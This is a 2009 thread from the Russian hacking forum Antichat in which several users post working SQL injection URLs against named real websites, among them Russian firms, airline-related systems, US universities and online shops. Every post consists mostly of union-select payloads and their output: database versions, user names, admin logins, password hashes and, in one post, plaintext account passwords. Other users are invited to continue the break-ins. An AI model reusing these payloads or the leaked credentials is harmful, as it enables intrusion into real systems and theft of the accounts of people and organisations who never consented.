Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.01.2009, 04:31
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Бажные сайты от iTex:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5/*
5.0.41-log:regiontools:regiontools@cub.mplik.ru
наугад подобрал таблицу админа:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,login,password), 2,3,4,5+from+rt_admin/*
admin:5583413443164b56500def9a533c7c70:159753
админка http://www.regiontools.ru/admin.php
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+version()/*&id=-100009+union+select+user()/*
5.0.41-log
avantage1@cub.mplik.ru
узнаём название таблицы админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
avg_admin
достаём логин и пасс админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+concat_ws(0x3a,login,password) +from+avg_admin/*
admin:6a4a680519c8eb06
админка http://www.avantage1.ru/cgi/admin.php
Так же на сайте присутствует форум phpbb,но походу права обрезаны т.к. при запросе на phpbb_users выдаёт ошибку.
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,user(),database ())/*
nevgroup@cub.mplik.ru:nevgroup
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
uralmpg_admin
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,name,password)+ from+uralmpg_admin/*
admin : 5d2e19393cc5ef67 : password
админка http://www.nevgroup.ru/admin.php
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4/*
ogn66@cub.mplik.ru : ogn66 : 5.0.41-log
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,table_name,4+from+informatio n_schema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
fire_admin
fire_cat
fire_cat_group
fire_cat_item
fire_contacts
fire_contactshort
fire_files
fire_hackers
fire_main
fire_meta
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,login,passwor d),4+from+fire_admin/*
ogn:3d8b2df05dd09579b699a9de68c0d4c0
админка http://www.ogn66.ru/admin.php
Ещё заинтересовала очень таблица fire_hackers 
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,column_name,4+from+informati on_schema.columns+where+table_name=0x666972655F686 1636B657273/*
т.к. кавычка экранируется то fire_hackers в hex
id
ip
faultscount
blockedtill
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,id,ip,faultsc ount,blockedtill),4+from+fire_hackers/*
1:172.22.1.40:5:2006-11-22 16:15:22
2:194.226.147.230:4:2006-11-22 16:15:22
3:212.23.76.23:4:2006-11-22 16:15:22
4:194.226.152.113:4:2006-11-22 16:15:22
6:62.33.99.50:1
7:87.224.234.89:1
8:195.189.109.34:1
хммм...
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,user(),vers ion(),database()),4/*&rand=474
koltsovo@localhost:5.0.27:koltsovo
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,table_name,4+from+informat ion_schema.tables+limit+16,1/*&rand=474
kol_admin
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,name,passwo rd),4+from+kol_admin/*&rand=474
admin:*CF7FD12395BFB4CEF6EB0B7D4470B621D3F46BE9
vava:*424193A86C662F47463BC77A44B09CB77DDF5870
law:*831CEF9DA73F4BD8E83873E244FF0806EFA90497
orb:*B0F917485699B8B8453A9D41BD2731E69D9D0026
snow:*619C257D7D5EF71F843A7F8F593C1D33C0F1E9EE
forum:*3E64FE741BF14A31A4ED2B58A75A93EB16D809ED
cargo:*B77FC59BEB345D39A5E263E140E50AEB03F05873:cargaison
Так же заинтересовала очень табличка ua_paroles
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,column_name,4+from+informa tion_schema.columns+where+table_name=0x75615F70617 26F6C6573/*&rand=474#
id
name
class
content
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,id,name,cla ss,content),4+from+ua_paroles+limit+0,1/*&rand=474#
и через limit выводим:
1:vava: password:vo44
3:vava:admin:1
41:uralairline3: password:Sa13na
10:vava:ip:*.*.*.*
12:vava:ip:62.117.33.118
8:vava:ip:62.177.33.118
38:uralairline2: password:lO0ka2
13:skip: password:antiskip
14:skip:ip:*.*.*.*
20:zephyr: password:gene5ys
19:vava:ak:у6,u6,svr,сжр
21:zephyr:ip:*.*.*.*
22:zephyr:ak:ют,p2,piv,
39:uralairline2:ip:*.*.*.*
26:zephyr:admin:1
27:utair: password:uta1R
28:utair:ip:*.*.*.*
29:utair:ak:ют,p2,piv
40:uralairline2:ak:у6,u6,svr,сжр
30:skip:ak:у6,u6,svr,сжр
32:uralairlines: password:urAlA1rl1ne5
33:uralairlines:ip:*.*.*.*
34:uralairlines:ak:у6,u6,svr,сжр
42:uralairline3:ip:*.*.*.*
43:uralairline3:ak:у6,u6,svr,сжр
44:uralairline4: password:hO04
45:uralairline4:ip:*.*.*.*
46:uralairline4:ak:у6,u6,svr,сжр
47:uralairline5: password:xAv13r
48:uralairline5:ip:*.*.*.*
49:uralairline5:ak:у6,u6,svr,сжр
50:zozo:admin:1
51:zozo: password:z0z0
52:zozo:ip:*.*.*.*
53:zozo:ak:*
Так и не врубился от чего всё это =\
Последний раз редактировалось ILYAtirtir; 13.01.2009 в 05:09..
|
|
|
13.01.2009, 11:35
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
на мой взгляд очень интересная inj
при запросе
Код:
http://otium.ru/artists/?id=13'
выдаёт Ошибка! Не могу выполнить SQL запрос
работая order by добиваемся того, чтобы это сообщение пропало
Код:
http://otium.ru/artists/?id=-13+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5--
user(): otium_ru@localhost
version(): 5.1.29-rc
database(): otium_ru
тИЦ: 50
PR: 4 |
|
|
|
13.01.2009, 15:45
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Магазинчики
http://www.royallifestyle.in/category.php?id=31+union+select+1,concat_ws(0x3a3a ,version(),user(),database()),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32--&cid=23
5.0.51a-community
royal_royalife@localhost
royal_royalife
http://www.royallifestyle.in/category.php?id=31+UNION+SELECT+1,CONCAT(0x7873716 C696E6A626567696E,(SELECT+CONCAT(id,0x7873716C696E 6A64656C,username,0x7873716C696E6A64656C,password) +FROM+royal_royalife.tb_admin),0x7873716C696E6A656 E64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32--&cid=23
admin
123
http://www.positivehands.co.uk/products/category/Baby-Products/0/1291+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15--.html
Database Version: 4.1.22-standard
Database name: mohi4421_positivenew
User name: mohi4421_kalexik@localhost
|
|
|
|
13.01.2009, 16:24
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
И снова крым. Сайт города Симферополь
Код:
http://www.simferopol.org/modules/mydownloads/ratefile.php?lid=-24%20%20UNION%20SELECT%20concat_ws(0x3a3a,version(),user(),database())
version: 4.0.27-max-log
user:dbo95496483@74.208.16.2
database:db95496483
Последний раз редактировалось jokester; 13.01.2009 в 16:45..
Причина: Боян
|
|
|
|
13.01.2009, 16:27
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
еду...
Код:
http://organelledb.lsi.umich.edu/gene.php?id=-210148+union+select+1,version(),3,4,5,6,7,8,9--
magic_quotes=off
5.0.22-log
|
|
|
|
13.01.2009, 16:28
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://maricopa.edu/news/?story=-511+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E6 4),0x71),0x71),4,5--
тИЦ = 550
PageRank = 7
Database Version: 5.0.18-log
Database name: news
User name: news@sysweb1a.dist.maricopa.edu
Там в общем несколько баз и сайтов
Сильно расскапывать не стал кому надо продолжит.
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/gps_session.php?id=31+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Versi on(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x787 3716C696E6A656E64),0x71),0x71),3--
тИЦ = 210
PageRank = 6
Database Version: 5.0.18-log
Database name: ocotillo
User name: mcliweb@www.mcli.dist.maricopa.edu
|
|
|
|
13.01.2009, 17:11
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://www.geniv.com/ako888/search_lyric2.php?id=-55+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7--
5.0.51a-log
genivcom_geniv@boscgi1403.eigbox.net
genivcom_geniv
http://www.dhammaweb.net/monk/view.php?id=9831+union+select+1,2,3,4,5,6,concat_w s(0x3a3a,version(),user(),database()),8,9,10,11,12 ,13,14,15,16--
4.0.27-max-log
sayadaw@64.202.166.236
sayadaw
http://www.spartapewter.com/product-profile.php?ID=31+union+select+1,2,3,4,5,concat_ws (0x3a3a,version(),user(),database()),7,8,9,10--&IID=2&MID=5&CID=62
4.1.22-log
sparta_user@localhost
sparta_data
|
|
|
|
13.01.2009, 17:31
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
RuSoft.net
Код:
http://www.rusoft.net/download.php?id=-804%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12%20--
version:5.0.22
user:rusoft@localhost
database:rusoft |
|
|
|
13.01.2009, 20:50
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
SAN DIEGO STATE UNIVERSITY
http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+union+select+1,2,concat_ ws(0x3a3a,version(),user(),database()),4,5--
http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+UNION+SELECT+1,2,concat_ ws(0x3a3a,email,username,password),4,5+FROM+mashup .admin_details--
jvitagli@mail.sdsu.edu::jvitagli::mashup
Database Version: 5.0.45-log
Database name: mashup
User name: fnu@localhost
А вот до этого не добрался http://sdsu.edu
Мож кто нить доберётся подскажите...
|
|
|
|
13.01.2009, 22:38
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Типа Адалт и всё такое -) XXX
http://www.siam2play.com/play-clip.php?id=401798798798798+union+select+1,2,3,con cat_ws(0x3a3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13--&hasp=Sexy
Version:5.0.67-community-log
User:feedsone_ple@localhost
Database:feedsone_siam2play
http://www.beastiemixes.com/remixer.php?id=5234560+union+select+1,2,concat_ws( 0x3a3a,version(),user(),database()),4,5,6,7,8,9,10 ,11,12--
Version:4.1.22-max-log
User:beastiemixes2@64.202.163.149
Database:beastiemixes2
http://www.gamesinaflash.com/game.php?id=31234567+union+select+1,2,3,4,5,6,conc at_ws(0x3a3a,version(),user(),database()),8,9,10,1 1,12,13,14,15,16,17,18--
Version:4.1.22-standard
User:designnow@localhost
Database:designnow
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
